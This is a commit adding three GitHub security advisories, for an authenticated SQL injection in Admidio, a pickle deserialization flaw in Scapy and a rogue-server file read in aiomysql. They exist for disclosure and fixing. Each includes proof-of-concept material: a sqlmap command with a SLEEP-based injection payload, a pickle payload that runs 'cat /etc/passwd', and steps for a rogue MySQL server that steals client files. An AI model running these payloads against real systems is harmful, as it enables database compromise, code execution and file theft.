Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit ff17efcf37d8 · 2025-10-22T16:47:42.000Z
GHSA-2v5m-cq9w-fc33 GHSA-cq46-m9x9-j8w2 GHSA-r397-ff8c-wv2g
diff --git a/advisories/github-reviewed/2025/10/GHSA-2v5m-cq9w-fc33/GHSA-2v5m-cq9w-fc33.json b/advisories/github-reviewed/2025/10/GHSA-2v5m-cq9w-fc33/GHSA-2v5m-cq9w-fc33.json
@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2v5m-cq9w-fc33",
+  "modified": "2025-10-22T16:46:03Z",
+  "published": "2025-10-22T16:46:03Z",
+  "aliases": [],
+  "summary": "Admidio Vulnerable to Authenticated SQL Injection in Member Assignment Functionality",
+  "details": "### Summary\n\nAn authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.\n\n### Details\n\nThe vulnerability is located in the `adm_program/modules/groups-roles/members_assignment_data.php` script. This script handles an AJAX request to fetch a list of users for role assignment. The `filter_rol_uuid` GET parameter is not properly sanitized before being used in a raw SQL query.\n\n**File:** `adm_program/modules/groups-roles/members_assignment_data.php`\n```php\n// ... \n// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.\n$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');\n$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));\n\n// ... \n$filterRoleCondition = '';\nif ($getMembersShowAll) {\n    $getFilterRoleUuid = 0;\n} else {\n    // show only members of current organization\n    if ($getFilterRoleUuid !== '') {\n        // VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.\n        $filterRoleCondition = ' AND rol_uuid = \\''.$getFilterRoleUuid . '\\'';\n    }\n}\n\n// ...\n// The vulnerable $filterRoleCondition is then used inside a subselect.\n$sqlSubSelect = '(SELECT COUNT(*) AS count_this\n                    FROM '.TBL_MEMBERS.'\n              INNER JOIN '.TBL_ROLES.'\n                      ON rol_id = mem_rol_id\n              INNER JOIN '.TBL_CATEGORIES.'\n                      ON cat_id = rol_cat_id\n                   WHERE mem_usr_id  = usr_id\n                     AND mem_begin  <= \\''.DATE_NOW.'\\'\n                     AND mem_end     > \\''.DATE_NOW.'\\'\n                         '.$filterRoleCondition.'\n                     AND rol_valid = true\n                     AND cat_name_intern <> \\'EVENTS\\'\n                     AND cat_org_id = '.$gCurrentOrgId.')';\n// ...\n```\n\nAs shown above, the value of `$getFilterRoleUuid` is directly concatenated into the `$filterRoleCondition` variable, which is then embedded within a larger SQL query (`$sqlSubSelect`). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.\n\n### PoC (Proof of Concept)\n\n**Prerequisites:**\n1.  A running instance of Admidio (tested on version 4.3.16).\n2.  An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).\n\n**Execution:**\nThe vulnerability can be triggered by manipulating the `filter_rol_uuid` parameter in the request to `/adm_program/modules/groups-roles/members_assignment_data.php`. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with `sqlmap`.\n\n1.  Log in to Admidio as an administrator.\n2.  Navigate to `Groups / Roles`.\n3.  Click the \"Assign members\" icon for any existing role.\n4.  Using a web proxy like Burp Suite, intercept the GET request made to `/adm_program/modules/groups-roles/members_assignment_data.php`.\n5.  Save the entire raw request to a text file (e.g., `admidio_request.txt`).\n6.  Run the following `sqlmap` command to confirm the time-based blind SQL injection:\n\n```bash\nsqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db\n```\n\n**Result:**\n`sqlmap` will successfully identify and exploit the time-based blind SQL injection vulnerability.\n\n```\n---\nParameter: filter_rol_uuid (GET)\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...\n---\n[INFO] the back-end DBMS is MySQL\nback-end DBMS: MySQL >= 5.0.12\n[INFO] fetching current database\n[INFO] retrieved: admidio\ncurrent database: 'admidio'\n```\nThis confirms that an attacker can execute arbitrary SQL queries and extract information from the database.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "admidio/admidio"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "4.3.17"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 4.3.16"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-2v5m-cq9w-fc33"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Admidio/admidio/commit/fde81ae869e88a3cf42201f2548d57df785a37cb"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Admidio/admidio"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-89"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-22T16:46:03Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json b/advisories/github-reviewed/2025/10/GHSA-cq46-m9x9-j8w2/GHSA-cq46-m9x9-j8w2.json
@@ -0,0 +1,59 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cq46-m9x9-j8w2",
+  "modified": "2025-10-22T16:45:49Z",
+  "published": "2025-10-22T16:45:49Z",
+  "aliases": [],
+  "summary": "Scapy Session Loading Vulnerable to Arbitrary Code Execution via Untrusted Pickle Deserialization",
+  "details": "### Summary\n\nAn unsafe deserialization vulnerability in Scapy <v2.7.0 allows attackers to execute arbitrary code **when a malicious session file is locally loaded via the `-s` option**. This requires convincing a user to manually load a malicious session file.\n\n---\n\n### Details\n\nScapy’s interactive shell supports session loading using gzip-compressed pickle files:\n\n```bash\n./run_scapy -s <session_file.pkl.gz>\n```\n\nInternally, this triggers:\n\n```python\n# main.py\nSESSION = pickle.load(gzip.open(session_name, \"rb\"))\n```\n\nSince no validation or restriction is performed on the deserialized object, **any code embedded via `__reduce__()` will be executed immediately**. This makes it trivial for an attacker to drop a malicious `.pkl.gz` in a shared folder and have it executed by unsuspecting users.\n\nThe vulnerability exists in the `load_session` function, which deserializes data using `pickle.load()` on `.pkl.gz` files provided via the `-s` CLI flag or programmatically through `conf.session`.\n\n**Affected lines in source code**:\nhttps://github.com/secdev/scapy/blob/master/scapy/main.py#L569-L572\n\n```python\ntry:\n    s = pickle.load(gzip.open(fname, \"rb\"))\nexcept IOError:\n    try:\n        s = pickle.load(open(fname, \"rb\"))\n```\n\n---\n\n### PoC\n\nCreate a malicious payload:\n\n```python\nimport pickle, os, gzip\n\nclass RCE:\n    def __reduce__(self):\n        return (os.system, (\"cat /etc/passwd\",))\n\npayload = gzip.compress(pickle.dumps(RCE()))\n\nwith open(\"evil.pkl.gz\", \"wb\") as f:\n    f.write(payload)\n```\n\nThen run Scapy with:\n\n```bash\n./run_scapy -s ./evil.pkl.gz\n```\n\nResult: `cat /etc/passwd` executes immediately, before shell is shown.\n\n<img width=\"1035\" height=\"961\" alt=\"Screenshot 2025-08-05 034930-1\" src=\"https://github.com/user-attachments/assets/6748e9bc-57cb-4bd7-977e-e29da8ebc23d\" />\n\n---\n\n### Impact\n\nThis is a classic deserialization vulnerability which leads to Code Execution (CE) when untrusted data is deserialized.\n\nAny user who can trick another user into loading a crafted `.pkl.gz` session file (e.g. via `-s` option) can execute arbitrary Python code.\n\n- **Vulnerability type:** Insecure deserialization (Python `pickle`)\n- **CWE**: [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- **CVSS v4.0 Vector**: `CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`\n- **CVSS Score**: 5.4 (Medium)\n- **Impact:** Arbitrary Code Execution\n- **Attack vector:** Local or supply chain (malicious `.pkl.gz`)\n- **Affected users:** Any user who loads session files (even interactively)\n- **Affected version:** **Scapy v2.6.1**\n\n---\n\n### Mitigations\n\n- Do not use 'sessions' (the -s option when launching Scapy).\n- Use the Scapy 2.7.0+ where the session mechanism has been removed.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "scapy"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "2.6.1"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/secdev/scapy/security/advisories/GHSA-cq46-m9x9-j8w2"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/secdev/scapy/commit/13621d1145b3435e9d03caf20997107a84435c0b"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/secdev/scapy"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-502"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-22T16:45:49Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2025/10/GHSA-r397-ff8c-wv2g/GHSA-r397-ff8c-wv2g.json b/advisories/github-reviewed/2025/10/GHSA-r397-ff8c-wv2g/GHSA-r397-ff8c-wv2g.json
@@ -0,0 +1,68 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-r397-ff8c-wv2g",
+  "modified": "2025-10-22T16:47:10Z",
+  "published": "2025-10-22T16:47:10Z",
+  "aliases": [
+    "CVE-2025-62611"
+  ],
+  "summary": "aiomysql allows arbitrary access to client files through vulnerability of a malicious MySQL server",
+  "details": "### Summary\nThe client-side settings are not checked before sending local files to MySQL server, which allows obtaining arbitrary files from the client using a rogue server.\n\n### Details\nIt is possible to create a rogue MySQL server that emulates authorization, ignores client flags and requests arbitrary files from the client by sending a LOAD_LOCAL instruction packet. Related to CVE-2019-2503.\n\n### PoC\nFirst, start up a rogue MySQL server that ignores client-side flags and sends LOAD_LOCAL packet to the client – tested with https://github.com/rmb122/rogue_mysql_server\n\n1. Create a file to be stolen by the rogue server: `echo \"gotcha\" > /tmp/my_secret_file.txt`\n2. Clone the repo: `git clone git@github.com:rmb122/rogue_mysql_server.git && cd rogue_mysql_server`\n3. Build the server: `make rogue_mysql_server`\n4. Generate a sample config: `rogue_mysql_server -generate`\n5. In `config.yaml` change `file_list` to `[\"/tmp/my_secret_file.txt\"]`\n6. Run the server: `./rogue_mysql_server -config config.yaml`\n\nNext, the vulnerability can be seen in action with the following script, which can be run in a second terminal:\n```python3\nimport asyncio\n\nimport aiomysql\n\n\nloop = asyncio.get_event_loop()\n\n\nasync def test_example():\n    conn = await aiomysql.connect(\n        host=\"127.0.0.1\",\n        port=3306,\n        user=\"root\",\n        password=\"\",\n        db=\"mysql\",\n        loop=loop,\n        local_infile=0, # note that we explicitly forbid local_infile\n    )\n\n    cursor = await conn.cursor()\n    await cursor.execute(\"SELECT 1\")\n    print(cursor.description)\n    r = await cursor.fetchall()\n    print(r)\n    await cursor.close()\n    conn.close()\n\n\nloop.run_until_complete(test_example())\n```\n\nThe rogue server will output log messages indicating successful file read and save the contents in the `loot/` directory\n```\nlevel=info msg=\"Client from addr [xxx], ID [1] try to query [select 1]\"\nlevel=info msg=\"Now try to read file [/tmp/my_secret_file.txt] from addr [xxx], ID [1]\"\nlevel=info msg=\"Read success, stored at [./loot/xxx/1757403852610__tmp_top_secret_file.txt]\"\nlevel=info msg=\"Client leaved, Addr [xxx], ID [1]\"\n```\n\n### Impact\nThis vulnerability impacts products and environments that require connection to untrusted MySQL servers or allow the possibility for them to be compromised.\n\n### Fix suggestion\nCan be fixed by porting relevant changes from PyMySQL – https://github.com/PyMySQL/PyMySQL/commit/b5e17cee46e0706dbfd707cdd2024452f0fb3267",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "aiomysql"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.3.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.2.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/aio-libs/aiomysql/security/advisories/GHSA-r397-ff8c-wv2g"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/aio-libs/aiomysql/pull/1044"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/aio-libs/aiomysql/commit/32c4520dae3711367ded74a4726dcb8bb8919538"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/aio-libs/aiomysql"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-73"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2025-10-22T16:47:10Z",
+    "nvd_published_at": null
+  }
+}
